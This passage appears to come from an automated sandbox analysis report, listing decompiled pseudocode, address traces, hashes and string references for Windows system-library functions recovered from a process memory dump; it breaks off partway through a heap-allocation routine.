0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 02B0358F

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 78a10ce1278df3befcb8fb6ffd6ed84e6edb349cb5731460f5a5c1d285d5228e
Instruction ID: fb1ab6ff0dc5e4920af64a1fbe514ce5a04a734995914c755e9f54947141858a
Opcode Fuzzy Hash: 78a10ce1278df3befcb8fb6ffd6ed84e6edb349cb5731460f5a5c1d285d5228e
Instruction Fuzzy Hash: 694135B1D4052D9ADF21DA50CD84FAEB77DAB44714F1045E5AA09AB280DF309E888F94

Uniqueness

Uniqueness Score: -1.00%

Function 02B03884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02B03884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E02AC9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L02AA4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E02AC9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x02b03893
0x02b03896
0x02b03899
0x02b0389f
0x02b038a0
0x02b038a4
0x02b038a9
0x02b038ac
0x02b038ad
0x02b038ae
0x02b038af
0x02b038b1
0x02b038b4
0x02b038bb
0x02b038bc
0x02b038bd
0x02b038c4
0x02b038c8
0x02b038ca
0x02b038ca
0x02b038d5
0x02b0393e
0x02b03940
0x02b03942
0x02b03952
0x02b03954
0x02b03961
0x02b03961
0x02b03967
0x02b0396e
0x02b0396e
0x02b03947
0x02b0394c
0x00000000
0x02b0394c
0x02b038ea
0x02b038ee
0x02b038f8
0x02b038f9
0x02b038ff
0x02b03900
0x02b03902
0x02b03903
0x02b0390b
0x02b0390f
0x02b03950
0x00000000
0x02b03950
0x02b03915
0x02b0391d
0x02b0391d
0x02b03922
0x02b03926
0x00000000
0x02b03928
0x02b0392b
0x02b0392b
0x02b03935
0x02b03937
0x02b03937
0x00000000
0x02b03935
0x02b03926
0x02b038f0
0x00000000

Strings

BinaryName, xrefs: 02B038B4

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 752c56746866342892f7e25ca11bf80fb7ad2f79636d2ec8bd4f272400808c62
Instruction ID: 15a1f8cb1c1aa47210d0ffbef4166d4a7f6ac001ed8da0f0357d298850fce6e9
Opcode Fuzzy Hash: 752c56746866342892f7e25ca11bf80fb7ad2f79636d2ec8bd4f272400808c62
Instruction Fuzzy Hash: A731D632D00519AFDB16DB58C989E7BBBB5EB40720F1141E9AE56A72D0DB309E00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02ABD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E02ABD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2b7d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E02AA4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E02ACB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E02AC98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E02AC95D0();
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x02abd29c
0x02abd2a6
0x02abd2b1
0x02abd2b5
0x02abd2b6
0x02abd2bc
0x02abd2bd
0x02abd2be
0x02abd2bf
0x02abd2c2
0x02abd2c4
0x02abd2cc
0x02abd384
0x02abd34b
0x02abd34f
0x02abd350
0x02abd351
0x02abd35c
0x02abd35c
0x02abd2d6
0x02abd2da
0x02abd2e1
0x02abd361
0x02abd369
0x02abd36d
0x02abd2e3
0x02abd2e3
0x02abd2e3
0x02abd2e5
0x02abd2ed
0x02abd2f5
0x02abd2fa
0x02abd302
0x02abd303
0x02abd30b
0x02abd30f
0x02abd313
0x02abd318
0x02abd31c
0x02abd320
0x02abd379
0x02abd37d
0x00000000
0x00000000
0x02afaffe
0x02afb001
0x02afb011
0x00000000
0x02abd322
0x02abd322
0x02abd330
0x02abd337
0x02abd35d
0x02abd339
0x02abd33f
0x02abd38c
0x02abd38c
0x02abd33f
0x02abd349
0x00000000
0x02abd349

Strings

@, xrefs: 02ABD303

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9621994a8433ce740c402a1785542f843c763c04d4adbcda9069e3767068c8c9
Instruction ID: 056ef309788e6cc4417326b9d34a4786f76ffb7ed0c15a05f94896ec8089b38b
Opcode Fuzzy Hash: 9621994a8433ce740c402a1785542f843c763c04d4adbcda9069e3767068c8c9
Instruction Fuzzy Hash: 6C318CB65487059FC312DF28C980AABBBECEF85754F00096EF99593212DB35DD08CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02A91B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02A91B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E02ACBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E02ACA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E02ACA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L02AA4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x02a91b8f
0x02a91b9a
0x02a91b9c
0x02a91b9e
0x02a91ba3
0x02ae7010
0x02ae7010
0x00000000
0x02a91ba9
0x02a91ba9
0x02a91bae
0x00000000
0x02a91bc5
0x02a91bca
0x02a91bcf
0x02a91bd0
0x02a91bd1
0x02a91bd2
0x02a91bd6
0x02a91bdc
0x02a91be0
0x02ae6ffc
0x02ae7000
0x00000000
0x02ae7006
0x02ae7009
0x02ae7009
0x02a91be6
0x02a91bec
0x02a91c0b
0x02a91c0b
0x02a91c0c
0x02a91c11
0x02a91c12
0x02a91c15
0x02a91c1b
0x02a91c1f
0x02a91c31
0x02a91c33
0x02ae7026
0x02ae7026
0x02a91c21
0x02a91c24
0x02a91c24
0x02a91bee
0x02a91bee
0x02a91bf2
0x02a91c3a
0x02a91bf4
0x02a91bf4
0x02a91c05
0x02a91c05
0x02a91c09
0x02a91c3e
0x00000000
0x00000000
0x00000000
0x02a91c09
0x02a91bec
0x02a91be0
0x02a91bae
0x02a91c2e

Strings

WindowsExcludedProcs, xrefs: 02A91BC5

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 0f4d9fd5e1dcbc14bf79aca081b8914d49ed45ddba08cc35fa38782ddabbe67e
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7521F537500229ABCF219B5AC980F6BB7FDAF40A54F154825F9098B200DF34DD01EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AAF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AAF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x02aaf71d
0x02aaf722
0x02aaf726
0x02af4770
0x02aaf765
0x02aaf769
0x02aaf769
0x02aaf732
0x02af477a
0x00000000
0x02af477a
0x02aaf738
0x02aaf73a
0x02aaf73c
0x02aaf73f
0x02aaf746
0x02aaf778
0x02aaf7a9
0x02aaf7a9
0x02aaf754
0x02aaf75a
0x02aaf75d
0x02aaf75f
0x02aaf761
0x02aaf76f
0x02aaf771
0x02aaf771
0x02aaf76f
0x02aaf763
0x00000000
0x02aaf763
0x02aaf77d
0x02aaf7a3
0x02aaf7a5
0x00000000
0x02aaf7a5
0x02aaf77f
0x02aaf782
0x02aaf784
0x02aaf786
0x00000000
0x00000000
0x00000000
0x02aaf788
0x02aaf748
0x02aaf74d
0x02aaf78d
0x02aaf793
0x02aaf7b7
0x02aaf7bc
0x00000000
0x02aaf7bc
0x02aaf798
0x00000000
0x00000000
0x02aaf79d
0x02aaf7b0
0x00000000
0x02aaf7b0
0x02aaf79f
0x00000000
0x02aaf74f
0x02aaf74f
0x00000000
0x02aaf74f

Strings

Actx , xrefs: 02AAF73F

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: c85a8fbc024e4e45ccc262bf5bd268cc66e8bfc58acf4d2709b46e607a24d9ac
Instruction ID: 8691dcf8890c351156fe19bce82a8f3df67dac01ab5073a69bbc2a7ce23f046d
Opcode Fuzzy Hash: c85a8fbc024e4e45ccc262bf5bd268cc66e8bfc58acf4d2709b46e607a24d9ac
Instruction Fuzzy Hash: 03117C35704652CFEB7C4F1988F0736B2A5AF95668F25452AE462CBB91EF76C840C340

Uniqueness

Uniqueness Score: -1.00%

Function 02B38DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E02B38DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x2b60d50);
				E02ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E02B15720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L02ADDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L02ADDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E02ADD130(_t34, _t39, _t40);
			}

0x02b38df1
0x02b38df1
0x02b38df1
0x02b38df1
0x02b38df1
0x02b38df1
0x02b38df3
0x02b38df8
0x02b38dfd
0x02b38e00
0x02b38e0e
0x02b38e2a
0x02b38e36
0x02b38e38
0x02b38e3c
0x02b38e46
0x02b38e46
0x02b38e36
0x02b38e50
0x02b38e56
0x02b38e59
0x02b38e5c
0x02b38e60
0x02b38e67
0x02b38e6d
0x02b38e73
0x02b38e74
0x02b38eb1
0x02b38ebd

Strings

Critical error detected %lx, xrefs: 02B38E21

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 619436fd8dadc13800a940c832c22b5413ff8672ee6a0a840057ce4d93fcc1ef
Instruction ID: f44d5aa93c6b0a041b2b9ea8718e44e49b6e3e303310b268b2a4180bdd44708a
Opcode Fuzzy Hash: 619436fd8dadc13800a940c832c22b5413ff8672ee6a0a840057ce4d93fcc1ef
Instruction Fuzzy Hash: 3A113976D94748DBDB26DFB4850579DBBB1FB04314F20429DE42A6B291CB340601CF15

Uniqueness

Uniqueness Score: -1.00%

Function 02B1FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02B1FF60

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 3e35461705f6ce3ba87563238f95640160b48317ab56bb38393f047a089d927b
Instruction ID: 715771522cf9dd1f372842dae58ac670fdb7d20be7558eb2f0c18643ca53e93f
Opcode Fuzzy Hash: 3e35461705f6ce3ba87563238f95640160b48317ab56bb38393f047a089d927b
Instruction Fuzzy Hash: 45110472991644EFEB22DB50CE48FA8B7B2FF08708F948484F5066B5A1CB789944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B55BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02B55BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x2b61178);
				E02ADD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E02B54C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E02ACD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E02B55542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x2b760e8;
								if( *0x2b760e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x2b760e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E02AC9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E02AC6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
